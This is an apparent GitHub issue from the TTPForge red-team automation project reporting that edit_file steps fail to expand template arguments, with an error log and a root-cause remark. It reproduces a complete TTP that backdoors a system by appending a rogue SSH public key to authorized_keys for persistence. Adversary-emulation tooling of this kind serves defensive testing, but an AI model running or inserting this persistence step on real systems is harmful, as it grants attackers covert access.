### ISSUE TITLE
🚨 [BUG] - EditSteps not parsing arg

### ISSUE THREAD

**Issue by l50** [facebookincubator/TTPForge#195]
### What happened?

Having a var in for `edit_file` doesn't work correctly. 

Example:

```
- name: modify-authorized_keys_with_backup
    edit_file: "{{args.ssh_authorized_keys}}"
    backup_file: "{{args.ssh_authorized_keys}}.bak"
    edits:
      - old: "$"  # End of file in regex
        new: "\n{{args.rogue_key}}"  # Append the rogue key
        regexp: true
```

Full associated TTP:

```
---
name: backdoor-authorized-keys
description: |
  Add rogue public SSH key to `$HOME/.ssh/authorized_keys` to maintain 
  persistence on a target system.
args:
  - name: ssh_authorized_keys
    default: "${HOME}/.ssh/authorized_keys"
  - name: rogue_key
    description: "The rogue public SSH key to be added"
  - name: cleanup
    default: true
steps:
  - name: ensure-authorized_keys-present
    inline: |
      set -e
      if [[ ! -f "{{args.ssh_authorized_keys}}" ]]; then
        echo "Error: no authorized_keys file present at the specified path."
        exit 1
      fi

  - name: modify-authorized_keys_with_backup
    edit_file: "{{args.ssh_authorized_keys}}"
    backup_file: "{{args.ssh_authorized_keys}}.bak"
    edits:
      - old: "$"  # End of file in regex
        new: "\n{{args.rogue_key}}"  # Append the rogue key
        regexp: true

  - name: cleanup
    inline: |
      set -e
      if [[ "{{args.cleanup}}" == true ]]; then
        mv "{{args.ssh_authorized_keys}}.bak" "{{args.ssh_authorized_keys}}"
      fi
```

### Any suggestions for fixing this bug?

From @d3sch41n: "root cause of this is edit_step does not call ExecutionContext::ExpandVariables  on those fields"

### Relevant log output

```shell
2023-07-20T12:43:12.040-0600    ERROR   blocks/ttps.go:263      [*] Error executing TTP: open /Users/jaysong/pt/tools/ttpforge/ttps/persistence/ssh/backdoor-authorized-keys/{{args.ssh_authorized_keys}}: no such file or directory
```
```


### Details about your environment

_No response_
